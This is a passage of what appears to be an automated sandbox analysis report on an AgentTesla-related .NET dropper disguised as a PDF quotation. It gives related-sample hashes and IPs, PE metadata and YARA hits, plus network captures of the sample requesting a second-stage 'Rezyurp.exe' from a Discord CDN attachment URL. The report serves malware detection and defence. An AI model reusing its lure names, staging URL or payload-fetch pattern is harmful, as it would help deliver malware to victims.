                                                  VJF4HONFgR.exeGet hashmaliciousCobaltStrikeBrowse
                                                  • 172.67.208.220
                                                  https://o7jq6.app.link/RdqZsE2bcDbGet hashmaliciousUnknownBrowse
                                                  • 104.18.26.193
                                                  ber 2023.msgGet hashmaliciousHTMLPhisherBrowse
                                                  • 104.17.2.184
                                                  SecuriteInfo.com.Win32.TrojanX-gen.19321.7615.exeGet hashmaliciousSmokeLoaderBrowse
                                                  • 172.67.171.76
                                                  CLOUDFLARENETUSPO184383.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                  • 172.67.215.45
                                                  Halkbank_Ekstre_20230918_44390_097542.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                  • 104.21.47.12
                                                  TOIXYXBFXF.pngGet hashmaliciousUnknownBrowse
                                                  • 172.64.154.107
                                                  Bank_Statement.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 162.159.135.233
                                                  thong_bao_hang_den_20233_2414458944.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 162.159.136.232
                                                  Ziraat_Bankasi_Swift_Mesaji.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                  • 172.67.131.40
                                                  Ziraat_Bankasi_Swift_Mesaji.pdf.exeGet hashmaliciousGuLoaderBrowse
                                                  • 172.67.131.40
                                                  https://xxui87wghqwyyuw8jh00989wjwqgu.trazosconstruccion.cl/jtruckenbrod@lockton.comGet hashmaliciousUnknownBrowse
                                                  • 104.21.2.50
                                                  http://57thandnormal.comGet hashmaliciousUnknownBrowse
                                                  • 104.21.82.223
                                                  #U00d6DEME_KOPYASI.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 162.159.129.233
                                                  #U00d6DEME_KOPYASI.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 162.159.135.233
                                                  BL_DRAFT_AND_PACKING_LIST.xlsGet hashmaliciousFormBook, NSISDropperBrowse
                                                  • 172.67.146.208
                                                  #U00d6DEME_DETAYLARI.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 162.159.137.232
                                                  https://fpq68.app.link/vl1f9jtoaDbGet hashmaliciousUnknownBrowse
                                                  • 104.18.26.193
                                                  Tzhwq.exeGet hashmaliciousSnake KeyloggerBrowse
                                                  • 162.159.133.233
                                                  file.exeGet hashmaliciousClipboard Hijacker, Djvu, Fabookie, RedLine, SmokeLoader, VidarBrowse
                                                  • 172.67.181.144
                                                  VJF4HONFgR.exeGet hashmaliciousCobaltStrikeBrowse
                                                  • 172.67.208.220
                                                  https://o7jq6.app.link/RdqZsE2bcDbGet hashmaliciousUnknownBrowse
                                                  • 104.18.26.193
                                                  ber 2023.msgGet hashmaliciousHTMLPhisherBrowse
                                                  • 104.17.2.184
                                                  SecuriteInfo.com.Win32.TrojanX-gen.19321.7615.exeGet hashmaliciousSmokeLoaderBrowse
                                                  • 172.67.171.76
                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  3b5074b1b5d032e5620f69f9f700ff0eBank_Statement.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 162.159.134.233
                                                  thong_bao_hang_den_20233_2414458944.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 162.159.134.233
                                                  SOA.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 162.159.134.233
                                                  obizx.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 162.159.134.233
                                                  #U00d6DEME_KOPYASI.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 162.159.134.233
                                                  T#U00fcrkiye_#U0130#U015f_Bankas#U0131_#U00d6deme.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 162.159.134.233
                                                  #U00d6DEME_KOPYASI.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 162.159.134.233
                                                  MR#72-1315.vbsGet hashmaliciousGuLoaderBrowse
                                                  • 162.159.134.233
                                                  1161051-Rev0.vbsGet hashmaliciousGuLoaderBrowse
                                                  • 162.159.134.233
                                                  #U00d6DEME_DETAYLARI.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 162.159.134.233
                                                  bPTV.exeGet hashmaliciousNjratBrowse
                                                  • 162.159.134.233
                                                  Tzhwq.exeGet hashmaliciousSnake KeyloggerBrowse
                                                  • 162.159.134.233
                                                  updated_soa.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 162.159.134.233
                                                  Grain_push_barges_Specification.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 162.159.134.233
                                                  solicitare_oferta_de_pret_Abzac_Romania.vbsGet hashmaliciousUnknownBrowse
                                                  • 162.159.134.233
                                                  PO-7100062_xlsx.vbsGet hashmaliciousGuLoaderBrowse
                                                  • 162.159.134.233
                                                  SHIPPING_DOCUMENT.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 162.159.134.233
                                                  Revised_Inv_with_new_bank_details.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 162.159.134.233
                                                  blTlJaVqEA.exeGet hashmaliciousAgentTeslaBrowse
                                                  • 162.159.134.233
                                                  file.exeGet hashmaliciousRisePro Stealer, VidarBrowse
                                                  • 162.159.134.233
                                                  No context
                                                  Process:C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):927
                                                  Entropy (8bit):5.364918554738821
                                                  Encrypted:false
                                                  SSDEEP:24:ML9E4KI2KDE4KhKYIqDcfJKhRAE4KzQK3E4KoE4Ad:MxHKI2YHKhBUoRAHKz93HKoH0
                                                  MD5:FAA42D383F086EB1E2A7CCC1EA3FCA12
                                                  SHA1:D3A9A12B6EF0C98407FDC88931780C91470453FA
                                                  SHA-256:B46A1C014FD7E8A54AD77CCE53420886AD3CCC49BA882AE338E5B28F235B2331
                                                  SHA-512:42353BD8E16FF4DB0724195DC116B15BA3F2EA3F50EAD603AE628DF29107F273C49C1985DEE236EF87AF290D71BA5613CFCCC83C37BE98A646195066B13B21EC
                                                  Malicious:false
                                                  Reputation:moderate, very likely benign file
                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\2bef38851483abae82f1172c1aaa604c\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\9d04ce1d8a3042f50b54c7f9ccdb4068\System.Core.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2e14a1befe55e7d9ad2457ceb5267e36\System.Xml.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\1aff708a68d7a055e25b20efa5a36148\System.Net.Http.ni.dll",0..
                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Entropy (8bit):5.85886357508921
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  • DOS Executable Generic (2002/1) 0.01%
                                                  File name:QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                                                  File size:672'768 bytes
                                                  MD5:a4be5e5c00ec493498b67ae5c2fd2d04
                                                  SHA1:1c197e31fb8fde59cdd69d2f69e13dde8db55413
                                                  SHA256:1b1c9bbe9504df699338d7e0f95579db33ae5aa611eb55559d05b116b8c80a84
                                                  SHA512:6d2b078de5fb3e4b626f26bb72a974507a94d9cbfebc902218ae09495a9b91c58554a645cd0d8a24aedbe0e058073d57fbc17bd48e3afcfe68fc3f309ff73cee
                                                  SSDEEP:12288:WRaIT2OpU4kW24+HJk2b3Q26L0irp+qQcDzX:Wjxp7n+pkc30L0zc/
                                                  TLSH:5EE4BE5676749132EC04CA3424F2EE14D2DBEE6C6BF1950924D8B6AD1B322FE8F079C5
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....4.e.................$...........B... ...`....@.. ....................................`................................
                                                  Icon Hash:0e3333b0bbb3b035
                                                  Entrypoint:0x4542fe
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x650934F7 [Tue Sep 19 05:43:19 2023 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                  Instruction
                                                  jmp dword ptr [00402000h]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x542b00x4b.text
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x560000x51aa4.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xa80000xc.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x20000x523040x52400False0.9773609659954408data7.979516114599912IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rsrc0x560000x51aa40x51c00False0.071357750382263data2.351708526517888IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc0xa80000xc0x200False0.041015625data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_ICON0x563700x128Device independent bitmap graphic, 16 x 32 x 4, image size 1920.7601351351351351
                                                  RT_ICON0x564980x368Device independent bitmap graphic, 16 x 32 x 24, image size 8320.7155963302752294
                                                  RT_ICON0x568000x468Device independent bitmap graphic, 16 x 32 x 32, image size 00.6826241134751773
                                                  RT_ICON0x56c680x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 6400.5389784946236559
                                                  RT_ICON0x56f500xca8Device independent bitmap graphic, 32 x 64 x 24, image size 32000.470679012345679
                                                  RT_ICON0x57bf80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 00.4378517823639775
                                                  RT_ICON0x58ca00x668Device independent bitmap graphic, 48 x 96 x 4, image size 15360.36402439024390243
                                                  RT_ICON0x593080x1ca8Device independent bitmap graphic, 48 x 96 x 24, image size 72960.33110687022900764
                                                  RT_ICON0x5afb00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 00.30881742738589213
                                                  RT_ICON0x5d5580xa68Device independent bitmap graphic, 64 x 128 x 4, image size 25600.2924174174174174
                                                  RT_ICON0x5dfc00x3228Device independent bitmap graphic, 64 x 128 x 24, image size 128000.26580996884735203
                                                  RT_ICON0x611e80x4228Device independent bitmap graphic, 64 x 128 x 32, image size 00.24244213509683515
                                                  RT_ICON0x654100x42028Device independent bitmap graphic, 256 x 512 x 32, image size 00.014139568600763382
                                                  RT_GROUP_ICON0xa74380xbcdata0.5797872340425532
                                                  RT_VERSION0xa74f40x3c4data0.4149377593360996
                                                  RT_MANIFEST0xa78b80x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                  DLLImport
                                                  mscoree.dll_CorExeMain
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Sep 19, 2023 18:56:18.515609026 CEST4973880192.168.2.5162.159.129.233
                                                  Sep 19, 2023 18:56:18.606514931 CEST8049738162.159.129.233192.168.2.5
                                                  Sep 19, 2023 18:56:18.606640100 CEST4973880192.168.2.5162.159.129.233
                                                  Sep 19, 2023 18:56:18.607820988 CEST4973880192.168.2.5162.159.129.233
                                                  Sep 19, 2023 18:56:18.699311972 CEST8049738162.159.129.233192.168.2.5
                                                  Sep 19, 2023 18:56:18.727654934 CEST8049738162.159.129.233192.168.2.5
                                                  Sep 19, 2023 18:56:18.769634008 CEST4973880192.168.2.5162.159.129.233
                                                  Sep 19, 2023 18:56:18.845865011 CEST49739443192.168.2.5162.159.134.233
                                                  Sep 19, 2023 18:56:18.845916033 CEST44349739162.159.134.233192.168.2.5
                                                  Sep 19, 2023 18:56:18.846009970 CEST49739443192.168.2.5162.159.134.233
                                                  Sep 19, 2023 18:56:18.858933926 CEST49739443192.168.2.5162.159.134.233
                                                  Sep 19, 2023 18:56:18.858967066 CEST44349739162.159.134.233192.168.2.5
                                                  Sep 19, 2023 18:56:19.054492950 CEST44349739162.159.134.233192.168.2.5
                                                  Sep 19, 2023 18:56:19.054620028 CEST49739443192.168.2.5162.159.134.233
                                                  Sep 19, 2023 18:56:19.056859970 CEST49739443192.168.2.5162.159.134.233
                                                  Sep 19, 2023 18:56:19.056864977 CEST44349739162.159.134.233192.168.2.5
                                                  Sep 19, 2023 18:56:19.057090998 CEST44349739162.159.134.233192.168.2.5
                                                  Sep 19, 2023 18:56:19.097670078 CEST49739443192.168.2.5162.159.134.233
                                                  Sep 19, 2023 18:56:19.168509960 CEST49739443192.168.2.5162.159.134.233
                                                  Sep 19, 2023 18:56:19.212641954 CEST44349739162.159.134.233192.168.2.5
                                                  Sep 19, 2023 18:56:19.370402098 CEST44349739162.159.134.233192.168.2.5
                                                  Sep 19, 2023 18:56:19.370491028 CEST44349739162.159.134.233192.168.2.5
                                                  Sep 19, 2023 18:56:19.370593071 CEST49739443192.168.2.5162.159.134.233
                                                  Sep 19, 2023 18:56:19.377451897 CEST49739443192.168.2.5162.159.134.233
                                                  Sep 19, 2023 18:56:38.364000082 CEST4973880192.168.2.5162.159.129.233
                                                  Sep 19, 2023 18:56:38.675901890 CEST4973880192.168.2.5162.159.129.233
                                                  Sep 19, 2023 18:56:38.768053055 CEST8049738162.159.129.233192.168.2.5
                                                  Sep 19, 2023 18:56:38.768197060 CEST4973880192.168.2.5162.159.129.233
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Sep 19, 2023 18:56:18.406034946 CEST6499753192.168.2.58.8.8.8
                                                  Sep 19, 2023 18:56:18.506567955 CEST53649978.8.8.8192.168.2.5
                                                  Sep 19, 2023 18:56:18.737102032 CEST6244953192.168.2.58.8.8.8
                                                  Sep 19, 2023 18:56:18.844629049 CEST53624498.8.8.8192.168.2.5
                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Sep 19, 2023 18:56:18.406034946 CEST192.168.2.58.8.8.80xd884Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)false
                                                  Sep 19, 2023 18:56:18.737102032 CEST192.168.2.58.8.8.80x2f46Standard query (0)cdn.discordapp.comA (IP address)IN (0x0001)false
                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Sep 19, 2023 18:56:18.506567955 CEST8.8.8.8192.168.2.50xd884No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)false
                                                  Sep 19, 2023 18:56:18.506567955 CEST8.8.8.8192.168.2.50xd884No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)false
                                                  Sep 19, 2023 18:56:18.506567955 CEST8.8.8.8192.168.2.50xd884No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)false
                                                  Sep 19, 2023 18:56:18.506567955 CEST8.8.8.8192.168.2.50xd884No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)false
                                                  Sep 19, 2023 18:56:18.506567955 CEST8.8.8.8192.168.2.50xd884No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)false
                                                  Sep 19, 2023 18:56:18.844629049 CEST8.8.8.8192.168.2.50x2f46No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)false
                                                  Sep 19, 2023 18:56:18.844629049 CEST8.8.8.8192.168.2.50x2f46No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)false
                                                  Sep 19, 2023 18:56:18.844629049 CEST8.8.8.8192.168.2.50x2f46No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)false
                                                  Sep 19, 2023 18:56:18.844629049 CEST8.8.8.8192.168.2.50x2f46No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)false
                                                  Sep 19, 2023 18:56:18.844629049 CEST8.8.8.8192.168.2.50x2f46No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)false
                                                  • cdn.discordapp.com
                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  0192.168.2.549739162.159.134.233443C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                  TimestampkBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  1192.168.2.549738162.159.129.23380C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                  TimestampkBytes transferredDirectionData
                                                  Sep 19, 2023 18:56:18.607820988 CEST594OUTGET /attachments/1152164172566630421/1153564703793107036/Rezyurp.exe HTTP/1.1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                  Host: cdn.discordapp.com
                                                  Connection: Keep-Alive
                                                  Sep 19, 2023 18:56:18.727654934 CEST595INHTTP/1.1 301 Moved Permanently
                                                  Date: Tue, 19 Sep 2023 16:56:18 GMT
                                                  Transfer-Encoding: chunked
                                                  Connection: keep-alive
                                                  Cache-Control: max-age=3600
                                                  Expires: Tue, 19 Sep 2023 17:56:18 GMT
                                                  Location: https://cdn.discordapp.com/attachments/1152164172566630421/1153564703793107036/Rezyurp.exe
                                                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                  Set-Cookie: __cf_bm=Ux.FURtVSo7pDjsB8lE3VbpgTq1BNM2LsUXCfiE8kFk-1695142578-0-ATjkGexIrGfc6AIqke4jkedsana+o2CW9PjGmcmt8VkBjwm7H9RkJlfVOvnRQvQb0CEaptYs3AMk0/jeFDoOyWg=; path=/; expires=Tue, 19-Sep-23 17:26:18 GMT; domain=.discordapp.com; HttpOnly; SameSite=None
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=t8mEe9ShvKOxhR6ArnD01VETAgv51sXBNEEXdzU%2Bs0%2FUsBh1s4JL2z%2F9Fal5SPIfDd85JsShPY1cUWraKgo2OE7ldfVPdn07cGFt1C34YEFb3rzQ%2BuHtvwfG4FSMemUtj4Nlag%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 80935c7c8eea0cac-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  Data Raw: 30 0d 0a 0d 0a
                                                  Data Ascii: 0


                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                  0192.168.2.549739162.159.134.233443C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                  TimestampkBytes transferredDirectionData
                                                  2023-09-19 16:56:19 UTC0OUTGET /attachments/1152164172566630421/1153564703793107036/Rezyurp.exe HTTP/1.1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
                                                  Host: cdn.discordapp.com
                                                  Connection: Keep-Alive
                                                  2023-09-19 16:56:19 UTC0INHTTP/1.1 404 Not Found
                                                  Date: Tue, 19 Sep 2023 16:56:19 GMT
                                                  Content-Type: application/xml; charset=UTF-8
                                                  Content-Length: 233
                                                  Connection: close
                                                  CF-Ray: 80935c801e2e0f70-EWR
                                                  CF-Cache-Status: EXPIRED
                                                  Cache-Control: public, max-age=31536000
                                                  Content-Disposition: attachment
                                                  Expires: Wed, 18 Sep 2024 16:56:19 GMT
                                                  Vary: Accept-Encoding
                                                  Alt-Svc: h3=":443"; ma=86400
                                                  X-GUploader-UploadID: ADPycdttIlLS4DZPGnjapuaH4IH3h668kquNljQgZPe-fWubTgvAhUkGio3FmEEev5-vR5BdzhXy8itN-sa7_uEXH7GJbQ
                                                  X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                  Set-Cookie: __cf_bm=0RkfxpWOthSR_M4WX33SHnxwmq.PBBz9w0zzi7FHLsg-1695142579-0-AbG8MuU4t6NFaTnWZGcHy6rJMbIrxRbtsDbFI2DYzZgwas/LDld+g9kZ0Nn+nm46+7YCJcqPskzXzbnlxNokCb4=; path=/; expires=Tue, 19-Sep-23 17:26:19 GMT; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=k%2BVW9qS5olmBj5R6Wb%2BCqDqCDRUwHQy%2FmOBfXJJf5%2BA8ozfXJWPynWbtxvILTsSuLa9ycp9uR2KzoHr2ZzAOSX7wp3cbuwl3cEK2Lt341mSp1M4jseh03HjHOulGoipmwrvFLA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  2023-09-19 16:56:19 UTC1INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 35 32 31 36 34 31 37 32 35 36 36 36 33 30 34 32 31
                                                  Data Ascii: <?xml version='1.0' encoding='UTF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1152164172566630421
                                                  2023-09-19 16:56:19 UTC1INData Raw: 2f 31 31 35 33 35 36 34 37 30 33 37 39 33 31 30 37 30 33 36 2f 52 65 7a 79 75 72 70 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                  Data Ascii: /1153564703793107036/Rezyurp.exe</Details></Error>


                                                  Click to jump to process

                                                  Click to jump to process

                                                  Click to dive into process behavior distribution

                                                  Click to jump to process

                                                  Target ID:0
                                                  Start time:18:55:40
                                                  Start date:19/09/2023
                                                  Path:C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:C:\Users\user\Desktop\QUOTATION_SEPT9FIBA00541#U00b7PDF.scr.exe
                                                  Imagebase:0xe80000
                                                  File size:672'768 bytes
                                                  MD5 hash:A4BE5E5C00EC493498B67AE5C2FD2D04
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:.Net C# or VB.NET
                                                  Yara matches:
                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.383516213.000000000352F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.383516213.0000000003533000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.383676188.00000000043D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.383516213.0000000003351000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.383893924.0000000005B60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.383676188.0000000004524000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.383516213.0000000003547000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.383516213.000000000354F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
